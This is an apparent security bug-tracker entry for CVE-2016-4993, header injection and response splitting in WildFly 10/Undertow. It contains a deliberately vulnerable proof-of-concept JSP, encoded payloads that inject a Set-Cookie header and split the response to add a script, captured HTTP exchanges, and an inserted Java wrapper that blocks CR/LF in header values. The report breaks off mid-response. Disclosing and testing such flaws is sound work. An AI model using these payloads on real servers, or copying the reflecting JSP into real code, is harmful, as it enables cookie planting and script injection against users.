
EMBARGOED CVE-2016-4993 wildfly: HTTP header injection / response splitting

    Details

    • Security Sensitive Issue:
      This issue is security relevant
    • Steps to Reproduce:

      NOTE: The following discussion mentions Spring specifically; however, the issue can also be exploited with a plain JSP.

      Internal RH testing was based on the following JSP (the PoC page, deliberately reflecting the parameter unchanged):

      <%
      if (request.getParameter("WELCOME") == null) {
          out.println("Please enter the welcome string");
      } else {
          out.println("Hello <b>" + request.getParameter("WELCOME") + "</b>!");
      }
      %>

      with the following payload:

      http://localhost:8080/Test1.war/?WELCOME=language=en%0A%0A%3Chtml%3E%3Cscript%3Ealert(123)%3C/script%3E%3Cbody%3E%3Ch1%3EWelcome!%3C/h1%3E%3C/body%3E%3C/html%3E%3C!

      Now the specific report:
      ========================

      WildFly/Undertow vulnerable to HTTP header injection/Response Splitting
      -----------------------------------------------------------------------

      The WildFly 10.0.0 Application Server/Undertow web server is vulnerable to the injection of arbitrary HTTP headers, and also Response Splitting, due to insufficient sanitisation and validation of user input before the input is used as part of a HTTP header value.

      The PoC described below was derived from code at: http://www.mkyong.com/spring-mvc/spring-mvc-internationalization-example. The code was packaged as a .war file (apart from Jetty) and hosted directly on the following servlet engines for comparison:

      • Jetty 9.2.11.v20150529
      • Tomcat 8.0.35
      • WildFly 10.0.0.Final

      The pom.xml file used in the actual PoC is shown at the bottom of this document.

      Systems affected:
      -----------------

      WildFly AS 10.0.0.Final / Undertow 1.3.15.Final

      Host machine:
      -------------

      Linux ubuntu 3.16.0-71-generic #92~14.04.1-Ubuntu SMP Thu May 12 23:31:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
      DISTRIB_ID=Ubuntu
      DISTRIB_RELEASE=14.04
      DISTRIB_CODENAME=trusty
      DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS"

      Description
      -----------

      Using a simple Spring MVC web application as a PoC (original here: http://www.mkyong.com/spring-mvc/spring-mvc-internationalization-example), it was observed that the WildFly Application Server/Undertow does not sanitise or strip newline characters before using them as part of a HTTP header. This behavior is in contrast to other JSP servlet engines tested with the same PoC code (currently Jetty 9.2.11.v20150529 and Tomcat 8.0.35), where the newline characters are removed and it is not possible to split or inject headers.

      In the case of the PoC, the org.springframework.web.servlet.i18n.LocaleChangeInterceptor is used to set a header value from user-supplied input, which determines the language of the page and the correct internationalization message to display.

      Using newline characters injected into the HTTP headers, it is possible for the malicious user to add arbitrary headers such as Set-Cookie to set arbitrary cookies, or potentially use a Location header for an open-redirect. By using two newline characters the attacker can 'split' the response (HTTP Response Splitting) and provide their own content that will be rendered to the victim user.

      Payloads:
      ---------

      Set-Cookie payload - en%0ASet-Cookie:MyCookieValue

      GET http://127.0.0.1:8888/SpringMVC/welcome.htm?language=en%0ASet-Cookie:MyCookieValue HTTP/1.1
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Cookie: JSESSIONID=jMNTfT-G_4QIwx8keYJtrFfmskg_Y6-lgQVuBlCx.ubuntu; __utma=96992031.883573134.1464252632.1464252632.1464252632.1; __utmz=96992031.1464252632.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
      Connection: keep-alive
      Host: 127.0.0.1:8888

      HTTP/1.1 200 OK
      Connection: keep-alive
      X-Powered-By: Undertow/1
      X-Powered-By: JSP/2.3
      Server: WildFly/10
      Content-Type: text/html;charset=UTF-8
      Content-Length: 290
      Content-Language: en
      set-cookie: mycookievalue-
      Date: Fri, 03 Jun 2016 15:44:10 GMT

      Response Splitting payload - en%0A%0A%3Chtml%3E%3Cscript%3Ealert(123)%3C/script%3E%3Cbody%3E%3Ch1%3EWelcome!%3C/h1%3E%3C/body%3E%3C/html%3E%3C!--

      GET http://127.0.0.1:8888/SpringMVC/welcome.htm?language=en%0A%0A%3Chtml%3E%3Cscript%3Ealert(123)%3C/script%3E%3Cbody%3E%3Ch1%3EWelcome!%3C/h1%3E%3C/body%3E%3C/html%3E%3C!-- HTTP/1.1
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Cookie: mycookievalue-; JSESSIONID=jMNTfT-G_4QIwx8keYJtrFfmskg_Y6-lgQVuBlCx.ubuntu; __utma=96992031.883573134.1464252632.1464252632.1464252632.1; __utmz=96992031.1464252632.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
      Connection: keep-alive
      Host: 127.0.0.1:8888

      HTTP/1.1 200 OK
      Connection: keep-alive
      X-Powered-By: Undertow/1
      X-Powered-By: JSP/2.3
      Server: WildFly/10
      Content-Type: text/html;charset=UTF-8
      Content-Length: 341
      Content-Language: en
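      The root cause in both exchanges above is a CR or LF reaching a response header value unchanged. The following servlet response wrapper is an added example (not Undertow's or WildFly's code, and not the fix shipped for this issue) of the guard the report says Tomcat and Jetty apply: it refuses any header value containing a line break, so neither the Set-Cookie injection nor the body split can happen, and its main() checks the two decoded payload values from the report. The class name HeaderSafeResponse and the helper names are assumptions.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpServletResponseWrapper;

/** Wraps the container response and rejects CR/LF in header values before they are written. */
public class HeaderSafeResponse extends HttpServletResponseWrapper {

    public HeaderSafeResponse(HttpServletResponse response) {
        super(response);
    }

    /** True when the value contains CR or LF, the characters that terminate a header line. */
    static boolean containsLineBreak(String value) {
        return value != null && (value.indexOf('\r') >= 0 || value.indexOf('\n') >= 0);
    }

    /** Alternative: drop the line-break characters instead of failing (the Tomcat/Jetty behaviour described in the report). */
    static String stripLineBreaks(String value) {
        return value == null ? null : value.replace("\r", "").replace("\n", "");
    }

    private static String checked(String name, String value) {
        if (containsLineBreak(value)) {
            // Fail closed: a value with a line break is never a legitimate locale, cookie or redirect target.
            throw new IllegalArgumentException("CR/LF rejected in value of header '" + name + "'");
        }
        return value;
    }

    @Override public void setHeader(String name, String value) { super.setHeader(name, checked(name, value)); }
    @Override public void addHeader(String name, String value) { super.addHeader(name, checked(name, value)); }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: the two query-string values from the report, URL-decoded as a servlet would see them.
        String cookiePayload = URLDecoder.decode("en%0ASet-Cookie:MyCookieValue", StandardCharsets.UTF_8.name());
        String splitPayload  = URLDecoder.decode("en%0A%0A%3Chtml%3E", StandardCharsets.UTF_8.name());
        System.out.println(containsLineBreak("en"));          // false: a normal locale passes
        System.out.println(containsLineBreak(cookiePayload)); // true: one LF, header injection
        System.out.println(containsLineBreak(splitPayload));  // true: two LFs, response splitting
        System.out.println(stripLineBreaks(cookiePayload));   // enSet-Cookie:MyCookieValue
    }
}
```

      Install it from a javax.servlet.Filter by passing new HeaderSafeResponse(httpResponse) down the chain, so every setHeader/addHeader call made by the application, including the locale interceptor, goes through the check.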


      Description

      It was reported that WildFly 10.0.0 Application Server/Undertow web server is vulnerable to the injection of arbitrary HTTP headers, and also Response Splitting, due to insufficient sanitisation and validation of user input before the input is used as part of a HTTP header value.

      Using newline characters injected into the HTTP headers, it is possible for the malicious user to add arbitrary headers such as Set-Cookie to set arbitrary cookies, or potentially use a Location header for an open-redirect. By using two newline characters the attacker can 'split' the response (HTTP Response Splitting) and provide their own content that will be rendered to the victim user.

      Refer to https://bugzilla.redhat.com/show_bug.cgi?id=1344321

      This issue is currently embargoed.

      People

      • Assignee: swd847 Stuart Douglas
      • Reporter: twalsh1 Tim Walsh
      • Votes: 0
      • Watchers: 2
